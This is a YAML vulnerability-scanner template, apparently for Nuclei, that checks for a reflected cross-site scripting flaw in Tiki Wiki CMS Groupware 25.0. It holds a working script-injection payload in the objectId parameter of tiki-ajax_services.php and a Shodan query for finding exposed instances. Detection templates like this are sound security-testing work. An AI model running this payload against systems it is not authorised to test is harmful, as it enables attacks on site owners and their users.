id: tikiwiki-xss

info:
  name: Tiki Wiki CMS Groupware v25.0 - Cross Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Tiki Wiki CMS Groupware version 25.0 suffers from a cross site scripting vulnerability.
  reference:
    - https://packetstormsecurity.com/files/170446/Tiki-Wiki-CMS-Groupware-25.0-Cross-Site-Scripting.html
  metadata:
    shodan-query: http.html:"tiki wiki"
    verified: "true"
  tags: edb,xss,tikiwiki,packetstorm,acketstorm

requests:
  - method: GET
    path:
      - "{{BaseURL}}/tiki/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>"
      - "{{BaseURL}}/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'Tiki Wiki CMS'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 403
